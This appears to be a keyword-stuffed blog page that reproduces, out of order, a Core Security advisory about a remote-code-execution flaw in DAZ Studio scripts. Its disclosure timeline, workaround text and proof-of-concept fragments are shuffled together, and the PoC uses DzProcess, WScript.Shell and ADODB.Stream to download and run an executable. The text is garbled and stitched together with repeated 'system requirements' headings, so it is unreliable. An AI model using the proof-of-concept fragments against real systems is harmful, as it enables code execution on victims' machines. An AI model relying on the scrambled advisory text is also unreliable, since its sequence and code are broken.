![]()
: CERT contacted DAZ four times between 11/16 and 11/30.: CERT communicates that the vendor doesn't seem familiar with vulnerability reporting/disclosure, and request additional information about the vulnerability.: CERT acknowledges the comunication, and Core reschedules the advisory to November 30th, 2009 based on CERT recommendations.: Since DAZ support team didn't respond to any mail, Core contacts CERT trying to obtain a valid security contact at DAZ. #DAZ STUDIO 3 SYSTEM REQUIREMENTS REGISTRATION#: Core completes a registration form to be able to contact the support team.: Core receives an email saying that Core contact email was not recognised as a registered email.: Core Security Technologies completes a support form trying to reach a security contact from DAZ.Var oProcess = new DzProcess() oProcess.start() ("s=WScript.CreateObject(\'WScript.Shell\') o=WScript.CreateObject(\'ADODB.Stream\') e=s.Environment DAZ Studio PoC var oFile = new DzFile("d:\\test.js") oFile.open(2) oFile.write #DAZ STUDIO 3 SYSTEM REQUIREMENTS CODE#ds file demonstrates remote code execution by downloading and executing putty in the context of DAZ Studio. Technical Description / Proof of Concept Code This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies during Bugweek 2009. #DAZ STUDIO 3 SYSTEM REQUIREMENTS WINDOWS#To prevent the accidental execution of malicious scripting files you can disable the default file association of the dangerous file extensions in the Windows Explorer. The vendor did not provide fixes or workaround information. Vendor Information, Solutions and Workarounds
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |